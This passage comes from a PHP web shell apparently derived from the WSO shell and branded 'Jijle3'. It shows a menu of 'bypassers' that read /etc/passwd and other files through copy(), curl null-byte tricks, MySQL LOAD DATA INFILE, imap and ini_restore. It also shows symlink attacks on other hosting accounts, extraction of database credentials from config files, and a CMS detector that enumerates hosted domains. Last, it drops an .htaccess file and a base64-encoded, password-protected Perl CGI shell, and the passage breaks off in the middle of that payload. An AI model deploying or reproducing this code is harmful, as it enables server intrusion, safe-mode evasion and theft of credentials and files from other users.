1107<a href='sym/root/home/".$UID['name']."/public_html' target='_blank'>Symlink </a>
1108</td>
1109
1110</tr></div> ";
1111flush();
1112}
1113}
1114}
1115}
1116
1117echo "</center></table>";
1118wsoFooter(); }
1119///Menus
1120####################### Baypassers #########################
1121function actionbypss() {
1122wsoHeader();
1123echo'
1124<center>
1125<a href=# onclick="g(\'bypassing\',\'' . $GLOBALS['home_cwd'] . '\',\'\',\'\',\'\')">[ Jijle3 Bypasser ]</a><br><br>
1126<a href=# onclick="g(\'etcnmd\',\'' . $GLOBALS['home_cwd'] . '\',\'\',\'\',\'\')">[ Server User Function Bypasser ]</a><br><br>
1127<a href=# onclick="g(\'etcbaypass\',\'' . $GLOBALS['home_cwd'] . '\',\'\',\'\',\'\')">[ Etc/passwd/ Function Bypasser ]</a><br><br>
1128<a href=# onclick="g(\'SafeMode\',\'' . $GLOBALS['home_cwd'] . '\',\'\',\'\',\'\')">[ Safe Mode Bypass ]</a><br>
1129';
1130wsoFooter();}
1131####################### bypassing #########################
1132function actionbypassing() {
1133wsoHeader();
1134echo '<center><h1>Jijle3 Function Bypasser </h1>';
1135error_reporting(0);
1136set_magic_quotes_runtime(0);
1137if(version_compare(phpversion(), '4.1.0') == -1)
1138 {$_POST = &$HTTP_POST_VARS;$_GET = &$HTTP_GET_VARS;
1139 $_SERVER = &$HTTP_SERVER_VARS;
1140 }function inclink($link,$val){$requ=$_SERVER["REQUEST_URI"];
1141if (strstr ($requ,$link)){return preg_replace("/$link=[\\d\\w\\W\\D\\S]*/","$link=$val",$requ);}elseif (strstr ($requ,"showsc")){return preg_replace("/showsc=[\\d\\w\\W\\D\\S]*/","$link=$val",$requ);}
1142elseif (strstr ($requ,"hlp")){return preg_replace("/hlp=[\\d\\w\\W\\D\\S]*/","$link=$val",$requ);}elseif (strstr($requ,"?")){return $requ."&".$link."=".$val;}
1143else{return $requ."?".$link."=".$val;}}
1144function delm($delmtxt){print"<center><table bgcolor=black style='border:1px solid #008080' width=99% height=2%>";print"<tr><td><b><center><font size=2 color=#008080>$delmtxt</td></tr></table></center>";}
1145function callfuncs($cmnd){if (function_exists(shell_exec)){$scmd=shell_exec($cmnd);
1146$nscmd=htmlspecialchars($scmd);print $nscmd;}
1147elseif(!function_exists(shell_exec)){exec($cmnd,$ecmd);
1148$ecmd = join("\n",$ecmd);$necmd=htmlspecialchars($ecmd);print $necmd;}
1149elseif(!function_exists(exec)){$pcmd = popen($cmnd,"r");
1150while (!feof($pcmd)){ $res = htmlspecialchars(fgetc($pcmd));;
1151print $res;}pclose($pcmd);}elseif(!function_exists(popen)){
1152ob_start();system($cmnd);$sret = ob_get_contents();ob_clean();print htmlspecialchars($sret);}elseif(!function_exists(system)){
1153ob_start();passthru($cmnd);$pret = ob_get_contents();ob_clean();
1154print htmlspecialchars($pret);}}
1155function input($type,$name,$value,$size)
1156{if (empty($value)){print "<input type=$type name=$name size=$size>";}
1157elseif(empty($name)&&empty($size)){print "<input type=$type value=$value >";}
1158elseif(empty($size)){print "<input type=$type name=$name value=$value >";}
1159else {print "<input type=$type name=$name value=$value size=$size >";}}
1160function permcol($path){if (is_writable($path)){print "<font color=#008080>";
1161callperms($path); print "</font>";}
1162elseif (!is_readable($path)&&!is_writable($path)){print "<font color=red>";
1163callperms($path); print "</font>";}
1164else {print "<font color=white>";callperms($path);}}
1165if ($dlink=="dwld"){download($_REQUEST['dwld']);}
1166function download($dwfile) {$size = filesize($dwfile);
1167@header("Content-Type: application/force-download;name=$dwfile");
1168@header("Content-Transfer-Encoding: binary");
1169@header("Content-Length: $size");
1170@header("Content-Disposition: attachment; filename=$dwfile");
1171@header("Expires: 0");
1172@header("Cache-Control: no-cache, must-revalidate");
1173@header("Pragma: no-cache");
1174@readfile($dwfile); exit;}
1175?>
1176<?
1177$nscdir =(!isset($_REQUEST['scdir']))?getcwd():chdir($_REQUEST['scdir']);$nscdir=getcwd();
1178$sf="<form method=post>";$ef="</form>";
1179$st="<table style=\"border:1px #dadada solid \" width=100% height=100%>";
1180$et="</table>";$c1="<tr><td height=22% style=\"border:1px #dadada solid \">";
1181$c2="<tr><td style=\"border:1px #dadada solid \">";$ec="</tr></td>";
1182$sta="<textarea cols=157 rows=23>";$eta="</textarea>";
1183$sfnt="<font face=tahoma size=2 color=#008080>";$efnt="</font>";
1184///////////////////////////////
1185 //
1186$mysql_use = "no"; //"yes" //
1187$mhost = "localhost"; //
1188$muser = "root"; //
1189$mpass = "pass"; //
1190$mdb = "name"; //
1191$them = "xxx"; //any site //
1192$you = "xx"; //your username //
1193$flib = "hack15.txt"; //
1194$folder = "hack15.txt"; //
1195///////////////////////////////
1196################# PhP Hacked ########################
1197// read greet //
1198if ($linux=='greet')
1199{
1200 echo "</textarea>";
1201}
1202// read file unzend sorce //
1203if(empty($_POST['sorce'])){
1204} else {
1205}
1206// read file unzend functions //
1207 if(empty($_POST['func'])){
1208} else {
1209echo "<textarea method='POST' cols='95' rows='30' wrar='off' >";
1210$zeen=$_POST['func'];
1211require("$zeen");
1212echo "Database : ".$config['Database']['dbname']." <X> ";
1213echo "UserName : ".$config['MasterServer']['username']." <X> ";
1214echo "Password : ".$config['MasterServer']['password']." <X> ";
1215echo "</textarea></p>";
1216}// read file symlink ( ) //
1217if(empty($_POST['sym'])){
1218} else {
1219echo "<textarea method='POST' cols='95' rows='30' wrar='off' >";
1220$fp = fopen("hack15.txt","w+");
1221fwrite($fp,"Php Hacker Was Here");
1222@unlink($flib);
1223$sym = "/home/" . $them . "/public_html/" . $k;
1224$link = "/home/" . $you . "/public_html/" . $folder . "/" . $flib;
1225@symlink($sym, $link);
1226if ($k{0} == "/") {
1227echo "<script> window.location = '" . $flib . "'</script>";
1228}else{
1229echo "<pre><xmp>";
1230echo readlink($flib) . "\n";
1231echo "Filesize: " . linkinfo($flib) . "B\n\n";
1232echo file_get_contents("http://" . $_SERVER['HTTP_HOST'] . "/" . $folder . "/" . $flib);
1233 echo "</textarea>";
1234}
1235}
1236
1237// read file plugin ( ) //
1238if(empty($_POST['plugin'])){
1239} else {
1240echo "<textarea method='POST' cols='95' rows='30' wrar='off' >";
1241for($uid=0;$uid<60000;$uid++){ //cat /etc/passwd
1242 $ara = posix_getpwuid($uid);
1243 if (!empty($ara)) {
1244 while (list ($key, $val) = each($ara)){
1245 print "$val:";
1246 }
1247 print "\n";
1248 }
1249 }
1250 echo "</textarea>";
1251}
1252// read file id ( ) //
1253if ($_POST['rid'] ){
1254echo "<textarea method='POST' cols='95' rows='30' wrar='off' >";
1255 for($uid=0;$uid<60000;$uid++){ //cat /etc/passwd
1256$ara = posix_getpwuid($uid);
1257 if (!empty($ara)) {
1258while (list ($key, $val) = each($ara)){
1259print "$val:";
1260}
1261 print "\n";
1262}
1263 }
1264echo "</textarea>";
1265break;
1266
1267 }
1268// read file imap ( ) //
1269$string = !empty($_POST['rimap']) ? $_POST['rimap'] : 0;
1270if(empty($_POST['rimap'])){
1271} else {
1272echo "<textarea method='POST' cols='95' rows='30' wrar='off' >";
1273$stream = imap_open($string, "", "");
1274$str = imap_body($stream, 1);
1275echo "</textarea>";
1276}
1277// read file Curl ( ) //
1278if(empty($_POST['curl'])){
1279} else {
1280echo "<textarea method='POST' cols='95' rows='30' wrar='off' >";
1281$m=$_POST['curl'];
1282$ch =
1283curl_init("file:///".$m."\x00/../../../../../../../../../../../../".__FILE__);
1284curl_exec($ch);
1285var_dump(curl_exec($ch));
1286echo "</textarea>";
1287}
1288// read file SQL ( ) //
1289if(empty($_POST['ssql'])){
1290} else {
1291echo "<textarea method='POST' cols='95' rows='30' wrar='off' >";
1292$file=$_POST['ssql'];
1293$mysql_files_str = "/etc/passwd:/proc/cpuinfo:/etc/resolv.conf:/etc/proftpd.conf";
1294$mysql_files = explode(':', $mysql_files_str);
1295$sql = array (
1296"USE $mdb",
1297'CREATE TEMPORARY TABLE ' . ($tbl = 'A'.time ()) . ' (a LONGBLOB)',
1298"LOAD DATA LOCAL INFILE '$file' INTO TABLE $tbl FIELDS "
1299. "TERMINATED BY '__THIS_NEVER_HAPPENS__' "
1300. "ESCAPED BY '' "
1301. "LINES TERMINATED BY '__THIS_NEVER_HAPPENS__'",
1302"SELECT a FROM $tbl LIMIT 1"
1303);
1304mysql_connect ($mhost, $muser, $mpass);
1305 foreach ($sql as $statement) {
1306 $q = mysql_query ($statement);
1307 if ($q == false) die (
1308 "FAILED: " . $statement . "\n" .
1309 "REASON: " . mysql_error () . "\n"
1310 );
1311 if (! $r = @mysql_fetch_array ($q, MYSQL_NUM)) continue;
1312 echo htmlspecialchars($r[0]);
1313 mysql_free_result ($q);
1314 }
1315echo "</textarea>";
1316}
1317// read file copy & ini ( ) //
1318if (isset ($_REQUEST['safefile'])){
1319$file=$_REQUEST['safefile'];$tymczas="";if(empty($file)){
1320if(empty($_GET['file'])){if(empty($_POST['file'])){
1321print "<center>[ Please choose a file first to read it using copy() ]</center>";
1322} else {$file=$_POST['file'];}} else {$file=$_GET['file'];}}
1323$temp=tempnam($tymczas, "cx");if(copy("compress.zlib://".$file, $temp)){
1324$zrodlo = fopen($temp, "r");$tekst = fread($zrodlo, filesize($temp));
1325fclose($zrodlo);echo "<center><pre>".$sta.htmlspecialchars($tekst).$eta."</pre></center>";unlink($temp);} else {
1326print "<FONT COLOR=\"RED\"><CENTER>Sorry, Can't read the selected file !!
1327</CENTER></FONT><br>";}}if (isset ($_REQUEST['inifile'])){
1328ini_restore("safe_mode");ini_restore("open_basedir");
1329print "<center><pre>".$sta;
1330if (include(htmlspecialchars($_REQUEST['inifile']))){}else {print "Sorry, can't read the selected file !!";}
1331}
1332?>
1333</center><table bgcolor=#2A2A2A style="border:2px solid black" width=100%><tr><td width=50%><div align=left><table style="border:1px #dadada solid " width=100% height=100%>
1334<tr><td height=22% style="border:1px #dadada solid "><div><b>
1335<center>
1336Using copy() function</div></tr></td><tr>
1337<td style="border:1px #dadada solid "><form method=post>
1338<input type=text name=safefile value=/etc/passwd size=75 >
1339<input type=hidden name=scdir value=/etc/passwd >
1340<input type="hidden" name="a" value="bypassing"><input type=submit value=Bypass >
1341</center></tr></td></form></table></td><td height=20% width=50%><div align=right><table style="border:1px #dadada solid " width=100% height=100%><tr>
1342<td height=22% style="border:1px #dadada solid "><div><b><center>
1343Using ini_restore() function</div></tr></td><tr>
1344<td style="border:1px #dadada solid "><form method=post>
1345<input type=text name=inifile value=/etc/passwd size=75 >
1346<input type=hidden name=scdir value=/etc/passwd >
1347<input type="hidden" name="a" value="bypassing"><input type=submit value=Bypass >
1348</center></tr></td></form></table></td></tr></table><table bgcolor=#2A2A2A style="border:2px solid black" width=100%><tr>
1349<td width=50%><div align=left><table style="border:1px #dadada solid " width=100% height=100%><tr><td height=22% style="border:1px #dadada solid "><div><b><center>
1350Using sql() function</div></tr></td><tr>
1351<td style="border:1px #dadada solid "><form method=post>
1352<input type=text name=ssql value=/etc/passwd size=75 >
1353<input type=hidden name=scdir value=/etc/passwd >
1354<input type="hidden" name="a" value="bypassing"><input type=submit value=Bypass >
1355</center></tr></td></form></table></td><td height=20% width=50%><div align=right><table style="border:1px #dadada solid " width=100% height=100%><tr><td height=22% style="border:1px #dadada solid "><div><b><center>
1356Using Curl() function</div></tr></td><tr>
1357<td style="border:1px #dadada solid "><form method=post>
1358<input type=text name=curl value=/etc/passwd size=75 >
1359<input type=hidden name=scdir value=/etc/passwd >
1360<input type="hidden" name="a" value="bypassing"><input type=submit value=Bypass >
1361</center></tr></td></form></table></td></tr></table>
1362<table bgcolor=#2A2A2A style="border:2px solid black" width=100%><tr><td width=50%><div align=left>
1363<table style="border:1px #dadada solid " width=100% height=100%><tr><td height=22% style="border:1px #dadada solid "><div><b><center>
1364Using imap() function</div></tr></td><tr>
1365<td style="border:1px #dadada solid "><form method=post>
1366<input type=text name=rimap value=/etc/passwd size=75 >
1367<input type=hidden name=scdir value=/etc/passwd >
1368<input type="hidden" name="a" value="bypassing"><input type=submit value=Bypass >
1369</center></tr></td></form></table></td>
1370<td height=20% width=50%><div align=right>
1371<table style="border:1px #dadada solid " width=100% height=100%><tr><td height=22% style="border:1px #dadada solid "><div><b><center>
1372Using id() function</div></tr></td><tr>
1373<td style="border:1px #dadada solid "><form method=post>
1374<input type=text name=rid value=/etc/passwd size=75 >
1375<input type=hidden name=scdir value=/etc/passwd >
1376<input type="hidden" name="a" value="bypassing"><input type=submit value=Bypass >
1377</center></tr></td></form></table></td></tr></table><table bgcolor=#2A2A2A style="border:2px solid black" width=100%>
1378<tr><td width=50%><div align=left><table style="border:1px #dadada solid " width=100% height=100%><tr><td height=22% style="border:1px #dadada solid "><div><b><center>
1379Using plugin() function</div></tr></td><tr>
1380<td style="border:1px #dadada solid "><form method=post>
1381<input type=text name=plugin value=/etc/passwd size=75 >
1382<input type=hidden name=scdir value=/etc/passwd >
1383<input type="hidden" name="a" value="bypassing"><input type=submit value=Bypass >
1384</center></tr></td></form></table></td><td height=20% width=50%><div align=right><table style="border:1px #dadada solid " width=100% height=100%><tr>
1385<td height=22% style="border:1px #dadada solid "><div><b><center>
1386Using symlink() function</div></tr></td><tr>
1387<td style="border:1px #dadada solid "><form method=post>
1388<input type=text name=sym value=/etc/passwd size=75 >
1389<input type=hidden name=scdir value=/etc/passwd >
1390<input type="hidden" name="a" value="bypassing"><input type=submit value=Bypass >
1391</center></tr></td></form></table></td></tr></table>
1392<?php
1393wsoFooter(); }
1394####################### symlinker #########################
1395function actionsymlinker() {
1396wsoHeader();
1397echo'
1398<center>
1399<a href=# onclick="g(\'sym\',\'' . $GLOBALS['home_cwd'] . '\',\'\',\'\',\'\')">[ Symlink File ]</a><br><br>
1400<a href=# onclick="g(\'symserver\',\'' . $GLOBALS['home_cwd'] . '\',\'\',\'\',\'\')">[ Symlink Server From Named.conf ]</a><br><br>
1401<a href=# onclick="g(\'cms\',\'' . $GLOBALS['home_cwd'] . '\',\'\',\'\',\'\')">[ CMS Detector ]</a><br>
1402';
1403wsoFooter();}
1404####################### CMS #########################
1405function actioncms() {
1406wsoHeader();
1407 ?>
1408 <form action="?y=<?php echo $pwd; ?>&x=cms_detect" method="post">
1409<center><b><h1>CMS Detector</h1></b></center><br><br>
1410 <?php
1411if(!file_exists('pee.tmp')){
1412@fopen('pee.tmp', 'w');
1413
1414echo'<table align="center" border="1" width="45%" cellspacing="0" cellpadding="4" class="td1">';
1415echo'<tr><td><center><b>[ Web Site ]</b></center></td><td><center><b>[ User ]</b></center></td><td><center><b>[ CMS ]</b></center></td></table>';
1416
1417$p = 0;
1418
1419if(is_readable("/var/named")){
1420$list = scandir("/var/named");
1421$current_dir = posix_getcwd();
1422$dir = explode("/",$current_dir);
1423foreach($list as $domain){
1424if(strpos($domain,".db"))
1425{
1426 $domain = str_replace('.db','',$domain);
1427 $owner = posix_getpwuid(fileowner("/etc/valiases/".$domain));
1428
1429error_reporting(0);
1430
1431$link = $pageURL.'pee/'.$owner['name'];
1432
1433cms_add($link,$domain,$owner['name'],"WordPress");
1434cms_add($link,$domain,$owner['name'],"Joomla");
1435cms_add($link,$domain,$owner['name'],"vBulletin");
1436cms_add($link,$domain,$owner['name'],"WHMCS");
1437cms_add($link,$domain,$owner['name'],"PhpBB");
1438cms_add($link,$domain,$owner['name'],"MyBB");
1439cms_add($link,$domain,$owner['name'],"IPB");
1440cms_add($link,$domain,$owner['name'],"SMF");
1441cms_add($link,$domain,$owner['name'],"Drupal");
1442cms_add($link,$domain,$owner['name'],"e107");
1443cms_add($link,$domain,$owner['name'],"Seditio");
1444cms_add($link,$domain,$owner['name'],"osCommerce");
1445}
1446}
1447}
1448}else{
1449echo'<table align="center" border="1" width="45%" cellspacing="0" cellpadding="4" class="td1">';
1450echo'<tr><td><center><b>[ Web Site ]</b></center></td><td><center><b>[ User ]</b></center></td><td><center><b>[ CMS ]</b></center></td></table><br><br>';
1451$content = file_get_contents($pageURL.'pee.tmp');
1452echo $content;
1453}
1454wsoFooter();}
1455##################### CGI SHELL ####################
1456function actioncgi() {
1457wsoHeader();
1458echo '<center><h1>Sample CGI Perl Shell</h1><div class=content>';
1459echo '<center><h2>Password : jijle3</h2><div class=content>';
1460
1461mkdir('cgi-telnet', 0755);
1462 chdir('cgi-telnet');
1463 $kokdosya = ".htaccess";
1464 $dosya_adi = "$kokdosya";
1465 $dosya = fopen ($dosya_adi , 'w') or die ("Dosya açılamadı!");
1466 $metin = "Options FollowSymLinks MultiViews Indexes ExecCGI
1467
1468AddType application/x-httpd-cgi .cin
1469
1470AddHandler cgi-script .cin
1471AddHandler cgi-script .cin";
1472 fwrite ( $dosya , $metin ) ;
1473 fclose ($dosya);
1474$cgishellizocin = '
1475IyEvdXNyL2Jpbi9wZXJsIC1JL3Vzci9sb2NhbC9iYW5kbWFpbg0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0KIyA8YiBzdHlsZT0iY29sb3I6YmxhY2s7YmFja2dyb3VuZC1jb2xvcjojZmZmZjY2Ij5bIFNhbXBsZSBDR0kgU2hlbGwgXS9iPiAjIHNlcnZlcg0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0KDQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQojIENvbmZpZ3VyYXRpb246IFlvdSBuZWVkIHRvIGNoYW5nZSBvbmx5ICRQYXNzd29yZCBhbmQgJFdpbk5ULiBUaGUgb3RoZXINCiMgdmFsdWVzIHNob3VsZCB3b3JrIGZpbmUgZm9yIG1vc3Qgc3lzdGVtcy4NCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCiRQYXNzd29yZCA9ICJqaWpsZTMiOwkJIyBDaGFuZ2UgdGhpcy4gWW91IHdpbGwgbmVlZCB0byBlbnRlciB0aGlzDQoJCQkJIyB0byBsb2dpbi4NCg0KJFdpbk5UID0gMDsJCQkjIFlvdSBuZWVkIHRvIGNoYW5nZSB0aGUgdmFsdWUgb2YgdGhpcyB0byAxIGlmDQoJCQkJIyB5b3UncmUgcnVubmluZyB0aGlzIHNjcmlwdCBvbiBhIFdpbmRvd3MgTlQNCgkJCQkjIG1hY2hpbmUuIElmIHlvdSdyZSBydW5uaW5nIGl0IG9uIFVuaXgsIHlvdQ0KCQkJCSMgY2FuIGxlYXZlIHRoZSB2YWx1ZSBhcyBpdCBpcy4NCg0KJE5UQ21kU2VwID0gIiYiOwkJIyBUaGlzIGNoYXJhY3RlciBpcyB1c2VkIHRvIHNlcGVyYXRlIDIgY29tbWFuZHMNCgkJCQkjIGluIGEgY29tbWFuZCBsaW5lIG9uIFdpbmRvd3MgTlQuDQoNCiRVbml4Q21kU2VwID0gIjsiOwkJIyBUaGlzIGNoYXJhY3RlciBpcyB1c2VkIHRvIHNlcGVyYXRlIDIgY29tbWFuZHMNCgkJCQkjIGluIGEgY29tbWFuZCBsaW5lIG9uIFVuaXguDQoNCiRDb21tYW5kVGltZW91dER1cmF0aW9uID0gMTA7CSMgVGltZSBpbiBzZWNvbmRzIGFmdGVyIGNvbW1hbmRzIHdpbGwgYmUga2lsbGVkDQoJCQkJIyBEb24ndCBzZXQgdGhpcyB0byBhIHZlcnkgbGFyZ2UgdmFsdWUuIFRoaXMgaXMNCgkJCQkjIHVzZWZ1bCBmb3IgY29tbWFuZHMgdGhhdCBtYXkgaGFuZyBvciB0aGF0DQoJCQkJIyB0YWtlIHZlcnkgbG9uZyB0byBleGVjdXRlLCBsaWtlICJmaW5kIC8iLg0KCQkJCSMgVGhpcyBpcyB2YWxpZCBvbmx5IG9uIFVuaXggc2VydmVycy4gSXQgaXMNCgkJCQkjIGlnbm9yZWQgb24gTlQgU2VydmVycy4NCg0KJFNob3dEeW5hbWljT3V0cHV0ID0gMTsJCSMgSWYgdGhpcyBpcyAxLCB0aGVuIGRhdGEgaXMgc2VudCB0byB0aGUNCgkJCQkjIGJyb3dzZXIgYXMgc29vbiBhcyBpdCBpcyBvdXRwdXQsIG90aGVyd2lzZQ0KCQkJCSMgaXQgaXMgYnVmZmVyZWQgYW5kIHNlbmQgd2hlbiB0aGUgY29tbWFuZA0KCQkJCSMgY29tcGxldGVzLiBUaGlzIGlzIHVzZWZ1bCBmb3IgY29tbWFuZHMgbGlrZQ0KCQkJCSMgcGluZywgc28gdGhhdCB5b3UgY2FuIHNlZSB0aGUgb3V0cHV0IGFzIGl0DQoJCQkJIyBpcyBiZWluZyBnZW5lcmF0ZWQuDQoNCiMgRE9OJ1QgQ0hBTkdFIEFOWVRISU5HIEJFTE9XIFRISVMgTElORSBVTkxFU1MgWU9VIEtOT1cgV0hBVCBZT1UnUkUgRE9JTkcgISENCg0KJENtZFNlcCA9ICgkV2luTlQgPyAkTlRDbWRTZXAgOiAkVW5peENtZFNlcCk7DQokQ21kUHdkID0gKCRXaW5OVCA/ICJjZCIgOiAicHdkIik7DQokUGF0aFNlcCA9ICgkV2luTlQgPyAiXFwiIDogIi8iKTsNCiRSZWRpcmVjdG9yID0gKCRXaW5OVCA/ICIgMj4mMSAxPiYyIiA6ICIgMT4mMSAyPiYxIik7DQoNCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCiMgUmVhZHMgdGhlIGlucHV0IHNlbnQgYnkgdGhlIGJyb3dzZXIgYW5kIHBhcnNlcyB0aGUgaW5wdXQgdmFyaWFibGVzLiBJdA0KIyBwYXJzZXMgR0VULCBQT1NUIGFuZCBtdWx0aXBhcnQvZm9ybS1kYXRhIHRoYXQgaXMgdXNlZCBmb3IgdXBsb2FkaW5nIGZpbGVzLg0KIyBUaGUgZmlsZW5hbWUgaXMgc3RvcmVkIGluICRpbnsnZid9IGFuZCB0aGUgZGF0YSBpcyBzdG9yZWQgaW4gJGlueydmaWxlZGF0YSd9Lg0KIyBPdGhlciB2YXJpYWJsZXMgY2FuIGJlIGFjY2Vzc2VkIHVzaW5nICRpbnsndmFyJ30sIHdoZXJlIHZhciBpcyB0aGUgbmFtZSBvZg0KIyB0aGUgdmFyaWFibGUuIE5vdGU6IE1vc3Qgb2YgdGhlIGNvZGUgaW4gdGhpcyBmdW5jdGlvbiBpcyB0YWtlbiBmcm9tIG90aGVyIENHSQ0KIyBzY3JpcHRzLg0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0Kc3ViIFJlYWRQYXJzZSANCnsNCglsb2NhbCAoKmluKSA9IEBfIGlmIEBfOw0KCWxvY2FsICgkaSwgJGxvYywgJGtleSwgJHZhbCk7DQoJDQoJJE11bHRpcGFydEZvcm1EYXRhID0gJEVOVnsnQ09OVEVOVF9UWVBFJ30gPX4gL211bHRpcGFydFwvZm9ybS1kYXRhOyBib3VuZGFyeT0oLispJC87DQoNCglpZigkRU5WeydSRVFVRVNUX01FVEhPRCd9IGVxICJHRVQiKQ0KCXsNCgkJJGluID0gJEVOVnsnUVVFUllfU1RSSU5HJ307DQoJfQ0KCWVsc2lmKCRFTlZ7J1JFUVVFU1RfTUVUSE9EJ30gZXEgIlBPU1QiKQ0KCXsNCgkJYmlubW9kZShTVERJTikgaWYgJE11bHRpcGFydEZvcm1EYXRhICYgJFdpbk5UOw0KCQlyZWFkKFNURElOLCAkaW4sICRFTlZ7J0NPTlRFTlRfTEVOR1RIJ30pOw0KCX0NCg0KCSMgaGFuZGxlIGZpbGUgdXBsb2FkIGRhdGENCglpZigkRU5WeydDT05URU5UX1RZUEUnfSA9fiAvbXVsdGlwYXJ0XC9mb3JtLWRhdGE7IGJvdW5kYXJ5PSguKykkLykNCgl7DQoJCSRCb3VuZGFyeSA9ICctLScuJDE7ICMgcGxlYXNlIHJlZmVyIHRvIFJGQzE4NjcgDQoJCUBsaXN0ID0gc3BsaXQoLyRCb3VuZGFyeS8sICRpbik7IA0KCQkkSGVhZGVyQm9keSA9ICRsaXN0WzFdOw0KCQkkSGVhZGVyQm9keSA9fiAvXHJcblxyXG58XG5cbi87DQoJCSRIZWFkZXIgPSAkYDsNCgkJJEJvZHkgPSAkJzsNCiAJCSRCb2R5ID1+IHMvXHJcbiQvLzsgIyB0aGUgbGFzdCBcclxuIHdhcyBwdXQgaW4gYnkgTmV0c2NhcGUNCgkJJGlueydmaWxlZGF0YSd9ID0gJEJvZHk7DQoJCSRIZWFkZXIgPX4gL2ZpbGVuYW1lPVwiKC4rKVwiLzsgDQoJCSRpbnsnZid9ID0gJDE7IA0KCQkkaW57J2YnfSA9fiBzL1wiLy9nOw0KCQkkaW57J2YnfSA9fiBzL1xzLy9nOw0KDQoJCSMgcGFyc2UgdHJhaWxlcg0KCQlmb3IoJGk9MjsgJGxpc3RbJGldOyAkaSsrKQ0KCQl7IA0KCQkJJGxpc3RbJGldID1+IHMvXi4rbmFtZT0kLy87DQoJCQkkbGlzdFskaV0gPX4gL1wiKFx3KylcIi87DQoJCQkka2V5ID0gJDE7DQoJCQkkdmFsID0gJCc7DQoJCQkkdmFsID1+IHMvKF4oXHJcblxyXG58XG5cbikpfChcclxuJHxcbiQpLy9nOw0KCQkJJHZhbCA9fiBzLyUoLi4pL3BhY2soImMiLCBoZXgoJDEpKS9nZTsNCgkJCSRpbnska2V5fSA9ICR2YWw7IA0KCQl9DQoJfQ0KCWVsc2UgIyBzdGFuZGFyZCBwb3N0IGRhdGEgKHVybCBlbmNvZGVkLCBub3QgbXVsdGlwYXJ0KQ0KCXsNCgkJQGluID0gc3BsaXQoLyYvLCAkaW4pOw0KCQlmb3JlYWNoICRpICgwIC4uICQjaW4pDQoJCXsNCgkJCSRpblskaV0gPX4gcy9cKy8gL2c7DQoJCQkoJGtleSwgJHZhbCkgPSBzcGxpdCgvPS8sICRpblskaV0sIDIpOw0KCQkJJGtleSA9fiBzLyUoLi4pL3BhY2soImMiLCBoZXgoJDEpKS9nZTsNCgkJCSR2YWwgPX4gcy8lKC4uKS9wYWNrKCJjIiwgaGV4KCQxKSkvZ2U7DQoJCQkkaW57JGtleX0gLj0gIlwwIiBpZiAoZGVmaW5lZCgkaW57JGtleX0pKTsNCgkJCSRpbnska2V5fSAuPSAkdmFsOw0KCQl9DQoJfQ0KfQ0KDQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQojIFByaW50cyB0aGUgSFRNTCBQYWdlIEhlYWRlcg0KIyBBcmd1bWVudCAxOiBGb3JtIGl0ZW0gbmFtZSB0byB3aGljaCBmb2N1cyBzaG91bGQgYmUgc2V0DQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQpzdWIgUHJpbnRQYWdlSGVhZGVyDQp7DQoJJEVuY29kZWRDdXJyZW50RGlyID0gJEN1cnJlbnREaXI7DQoJJEVuY29kZWRDdXJyZW50RGlyID1+IHMvKFteYS16QS1aMC05XSkvJyUnLnVucGFjaygiSCoiLCQxKS9lZzsNCglwcmludCAiQ29udGVudC10eXBlOiB0ZXh0L2h0bWxcblxuIjsNCglwcmludCA8PEVORDsNCjxodG1sPg0KPGhlYWQ+DQo8dGl0bGU+Q0dJIFNoZWxsPC90aXRsZT4NCiRIdG1sTWV0YUhlYWRlcg0KDQoNCjwvaGVhZD4NCjxib2R5IG9uTG9hZD0iZG9jdW1lbnQuZi5AXy5mb2N1cygpIiBiZ2NvbG9yPSIjRkZGRkZGIiB0b3BtYXJnaW49IjAiIGxlZnRtYXJnaW49IjAiIG1hcmdpbndpZHRoPSIwIiBtYXJnaW5oZWlnaHQ9IjAiIHRleHQ9IiNGRjAwMDAiPg0KPHRhYmxlIGJvcmRlcj0iMSIgd2lkdGg9IjEwMCUiIGNlbGxzcGFjaW5nPSIwIiBjZWxscGFkZGluZz0iMiI+DQo8dHI+DQo8dGQgYmdjb2xvcj0iI0ZGRkZGRiIgYm9yZGVyY29sb3I9IiNGRkZGRkYiIGFsaWduPSJjZW50ZXIiIHdpZHRoPSIxJSI+DQo8Yj48Zm9udCBzaXplPSIyIj4jPC9mb250PjwvYj48L3RkPg0KPHRkIGJnY29sb3I9IiNGRkZGRkYiIHdpZHRoPSI5OCUiPjxmb250IGZhY2U9IlZlcmRhbmEiIHNpemU9IjIiPjxiPiANCjxiIHN0eWxlPSJjb2xvcjpibGFjaztiYWNrZ3JvdW5kLWNvbG9yOmJsYWNrIj5DR0kgU2hlbGw8L2I+IENvbm5lY3RlZCB0byAkU2VydmVyTmFtZTwvYj48L2ZvbnQ+PC90ZD4NCjwvdHI+DQo8dHI+DQo8dGQgY29sc3Bhbj0iMiIgYmdjb2xvcj0iI0ZGRkZGRiI+PGZvbnQgZmFjZT0iVmVyZGFuYSIgc2l6ZT0iMiI+DQoNCjxhIGhyZWY9IiRTY3JpcHRMb2NhdGlvbj9hPXVwbG